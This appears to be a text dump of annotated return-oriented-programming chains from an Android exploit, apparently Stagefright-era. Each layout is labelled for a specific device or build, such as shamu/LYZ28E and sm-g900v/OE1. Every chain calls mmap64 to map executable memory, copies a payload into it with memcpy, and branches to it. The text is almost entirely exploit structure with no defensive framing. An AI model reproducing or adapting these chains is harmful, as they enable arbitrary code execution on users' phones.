lrx value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 addres hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r7, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 lmy-1 value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 addres hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r7, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 lmy-2 value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 addres hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r6, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r6) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 shamu / LYZ28E value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 addres hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r6, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r6) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 shamu / LYZ28J value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 addres hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r6, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r6) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0 sm-g900v / OE1 value to be skipped (r3) value to be skipped (r4) pop {r0, r1, r2, r3, r4, r7, pc} mmap64 addres hint (none) mmap64 length (1 page) mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC) mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS) ptr to mmap64 (less 0x20) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} mmap64 fd mmap64 fd mmap64 offset (64-bit) mmap64 offset (64-bit) value to be skipped (r7) pop {r4, pc} ptr to memcpy (less 0x20) pop {r1, r2, r7, pc} memcpy src (address of payload) memcpy length (payload size) value to be skipped (r7) ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc} value to be skipped (r3) value to be skipped (r4) value to be skipped (r5) value to be skipped (r6) value to be skipped (r7) bx r0